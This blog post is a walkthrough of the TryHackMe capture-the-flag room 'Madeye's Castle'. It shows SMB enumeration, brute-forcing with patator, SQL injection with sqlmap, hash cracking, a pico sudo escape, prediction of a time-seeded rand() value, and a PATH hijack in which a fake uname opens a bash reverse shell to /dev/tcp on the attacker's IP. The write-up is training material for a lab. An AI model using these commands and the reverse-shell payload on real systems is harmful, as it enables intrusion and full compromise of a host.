---
layout: post
title:  "THM: Madeye's Castle"
date:   2021-02-01 19:00:00 +1100
category: hacking
---

## Madeye's Castle
*A boot2root box that is modified from a box used in CuCTF by the team at Runcode.ninja*

This is [Madeye's Castle](https://tryhackme.com/room/madeyescastle) from THM. It's medium rated and came out earlier today.

## Ports
SSH, HTTP on Port 80 and SMB (139/445) are our open ports.

## SMB
We have anonymous login with one hidden file and one not hidden file:

{% highlight shell %}
root@kali:/run/user/0/gvfs/smb-share:server=10.10.123.57,share=sambashare# ls -lash
total 1.5K
   0 drwx------ 1 root root   0 Nov 25 20:19 .
   0 dr-x------ 3 root root   0 Jan 31 19:30 ..
 512 -rwx------ 1 root root 147 Nov 25 20:19 .notes.txt
1.0K -rwx------ 1 root root 874 Nov 25 20:06 spellnames.txt
{% endhighlight %}

The *spellnames.txt* looks for all the world like a list of passwords, while the *notes* adds some flavour:

>Hagrid told me that spells names are not good since they will not "rock you"  
Hermonine loves historical text editors along with reading old books.

Okey dokey, a cryptic hint. By the way I've never read Harry Potter but even I know that's not how you spell Hermione.

## Web
At the website we have a slightly modified version of the Apache default page. Checking the page source we see this comment:

>TODO: Virtual hosting is good.   
TODO: Register for hogwartz-castle.thm

Okey dokey, adding *hogwartz-castle.thm* to /etc/hosts. Doing this and visting the page reveals a login portal. I generate a name list based on Harry Potter characters and throw *patator* at it:

``
root@kali:/opt/tryhackme/castle# patator http_fuzz url=http://hogwartz-castle.htm/ method=POST body='user=FILE0&password=FILE1' 0=./users.txt 1=./spellnames.txt -x ignore:fgrep='Incorrect Username or Password'
``

No dice. What about SQLi? Yes. I usually use *sqlmap* inside Burp Suite and this was no exception. It took a few attempts to get the parameters right but this is what it looked like:

``
-u 'http://hogwartz-castle.thm:80/login' --data='user=doesnot&password=pass' --level=2 --risk=3 --dump --no-cast -T users
``

With this, I got some hashes, including this:

>Harry Turner,0,"My linux username is my first name, and password uses best64",b326e7a664d756c39c9e09a98438b08226f98b89188ad144dd655f140674b5eb3fdac0f19bb3903be1f52c40c252c0e7ea7f5050dec63cf3c85290c0a2c5c885

Well, that's a long hash! *Hash-identifier* says it's SHA-512, and who am I to argue. Following the instruction, and using the information given, I ask John nicely:

{% highlight shell %}
root@kali:/opt/tryhackme/castle# john hash --format=Raw-SHA512 -w=./spellnames.txt --rules-stack=best64
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA512 [SHA512 128/128 AVX 2x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
wingardiumleviosa123 (?)
1g 0:00:00:00 DONE (2021-01-31 21:39) 100.0g/s 614400p/s 614400c/s 614400C/s terga..aguamenti21
Use the "--show" option to display all of the cracked passwords reliably
{% endhighlight %}

Now we have the SSH password for *harry*. Oh also I tried this with Hashcat and it didn't work. Shrug.

## Old what's 'er name?
Let's see what Harry can do:

{% highlight shell %}
harry@hogwartz-castle:~$ sudo -l
[sudo] password for harry: 
Matching Defaults entries for harry on hogwartz-castle:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User harry may run the following commands on hogwartz-castle:
    (hermonine) /usr/bin/pico
    (hermonine) /usr/bin/pico
{% endhighlight %}

Right, so we can become *hermonine* ... ah yeah, sure.

[GTFOBins](https://gtfobins.github.io/gtfobins/pico/#sudo) has our method:

>sudo pico  
^R^X  
reset; sh 1>&0 2>&0

This works, and we are *hermonine*.

## Hermonine
*hermonine* has an *ssh* folder in her home, so I add my SSH public key to authorized_keys so I can SSH in. Much nicer.

She has an interesting file in her *home* directory: 

{% highlight shell %}
hermonine@hogwartz-castle:~$ ls -lash
total 40K
4.0K drwxr-x--- 5 hermonine hermonine 4.0K Nov 26 01:29 .
4.0K drwxr-xr-x 4 root      root      4.0K Nov 26 01:50 ..
   0 lrwxrwxrwx 1 root      root         9 Nov 26 01:06 .bash_history -> /dev/null
4.0K -rw-r----- 1 hermonine hermonine  220 Apr  4  2018 .bash_logout
4.0K -rw-r----- 1 hermonine hermonine 3.7K Apr  4  2018 .bashrc
4.0K drwx------ 2 hermonine hermonine 4.0K Nov 26 01:29 .cache
4.0K drwx------ 3 hermonine hermonine 4.0K Nov 26 01:29 .gnupg
4.0K -rw-r----- 1 hermonine hermonine  807 Apr  4  2018 .profile
4.0K -rw------- 1 hermonine hermonine   36 Nov 26 01:23 .python_history
4.0K drwxr-x--- 2 hermonine hermonine 4.0K Feb  1 02:43 .ssh
4.0K -rw-r----- 1 hermonine hermonine   45 Nov 26 01:06 user2.txt
hermonine@hogwartz-castle:~$ cat .python_history 
import pwn
exit()
import pwn
exit()
{% endhighlight %}

So we have *pwntools*. Interesting.

Let's run linpeas, because I like linpeas:

{% highlight shell %}
-rwsr-xr-x 1 root   root       8.7K Nov 26 01:06 /srv/time-turner/swagger
  --- It looks like /srv/time-turner/swagger is executing time and you can impersonate it (strings line: time)
  --- It looks like /srv/time-turner/swagger is executing uname and you can impersonate it (strings line: uname -p)
  --- Trying to execute /srv/time-turner/swagger with strace in order to look for hijackable libraries...
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
{% endhighlight %}

Right, so something funny going on with a binary */srv/time-turner/swagger*. Let's run it:

{% highlight shell %}
hermonine@hogwartz-castle:/dev/shm$ /srv/time-turner/swagger 
Guess my number: 1
Nope, that is not what I was thinking
I was thinking of 840116301
{% endhighlight %}

Okay, let's just do that again:

{% highlight shell %}
hermonine@hogwartz-castle:/dev/shm$ /srv/time-turner/swagger 
Guess my number: 1
Nope, that is not what I was thinking
I was thinking of 677589366
{% endhighlight %}

This might require some more examination.

## Examination
Since I've got SSH access, let's grab the file with SCP:

``
root@kali:/opt/tryhackme/castle# scp hermonine@10.10.123.57:/srv/time-turner/swagger swagger
``

And have a look in Ghidra.

We have a *main* method:

{% highlight c %}
undefined8 main(void)

{
  time_t tVar1;
  long in_FS_OFFSET;
  uint local_18;
  uint local_14;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  tVar1 = time((time_t *)0x0);
  srand((uint)tVar1);
  local_14 = rand();
  printf("Guess my number: ");
  __isoc99_scanf(&DAT_00100b8d,&local_18);
  if (local_14 == local_18) {
    impressive();
  }
  else {
    puts("Nope, that is not what I was thinking");
    printf("I was thinking of %d\n",(ulong)local_14);
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}
{% endhighlight %}

And we better check the *impressive* method too:

{% highlight c %}
void impressive(void)

{
  setregid(0,0);
  setreuid(0,0);
  puts("Nice use of the time-turner!");
  printf("This system architecture is ");
  fflush(stdout);
  system("uname -p");
  return;
}
{% endhighlight %}

Right, so what's going on here?

>The C library function time_t time(time_t *seconds) returns the time since the Epoch (00:00:00 UTC, January 1, 1970), measured in seconds

and

>The C library function void srand(unsigned int seed) seeds the random number generator used by the function rand.

Definitions from [tutorialspoint](https://www.tutorialspoint.com/). So in the *main* method, the time in seconds is used to seed a random value, which is then compared to the guess. If the guess is correct, the *impressive* method is called, which then does *setreuid* and uses *uname* with a path. So we have to abuse *uname*, and we have to guess the correct number.

## Non-random
We can get the system time in seconds like so:

{% highlight shell %}
root@kali:/opt/tryhackme/castle/crack# date '+%s'
1612169467
{% endhighlight %}

So we run that on the box to see what the current system time is. We can create our own file:

{% highlight c %}
#include <stdio.h>
#include <time.h>
#include <stdlib.h>

int main () {

   time_t timeval;
   unsigned number;
   timeval = 1612158200;
   srand((unsigned)timeval);
   number = rand();

   printf("Value:  %d\n", number);
   return(0);
}
{% endhighlight %}

In this we enter some value for *timeval* which is in the near future, and get out what the seeded random number would be. For this example:

{% highlight shell %}
root@kali:/opt/tryhackme/castle# gcc nonrand.c -o nonrand
root@kali:/opt/tryhackme/castle# ./nonrand 
Value:  1477455573
{% endhighlight %}

Now we need to create a malicious *uname* on the box:

{% highlight shell %}
hermonine@hogwartz-castle:/tmp$ printf '#!/bin/bash\n' >> uname
hermonine@hogwartz-castle:/tmp$ printf 'bash -i >& /dev/tcp/10.9.10.123/1234 0>&1\n' >> uname
hermonine@hogwartz-castle:/tmp$ chmod 777 uname
hermonine@hogwartz-castle:/tmp$ export PATH=/tmp:$PATH
{% endhighlight %}

Then we start a listener. Note I did try this in */dev/shm* first but it didn't work; I assume */dev/shm* was set as non-executable. It happens sometimes.

Now, we need to pass our non-random number to the binary at the right time. Presumably this is why we were given *pwntools*. We don't need it; I just spammed this leading up to the time:

``
hermonine@hogwartz-castle:/tmp$ echo '1477455573' | /srv/time-turner/swagger
``

We get a new random number once every second and the script runs fast so it's not hard to do this manually; sure enough:

{% highlight shell %}
hermonine@hogwartz-castle:/tmp$ echo '1477455573' | /srv/time-turner/swagger 
Guess my number: Nice use of the time-turner!
This system architecture is 
{% endhighlight %}

And in the listener:

{% highlight shell %}
root@kali:/opt/tryhackme/castle# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.79.116] 42138
root@hogwartz-castle:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root),1002(hermonine)
{% endhighlight %}

Boom, pwned.
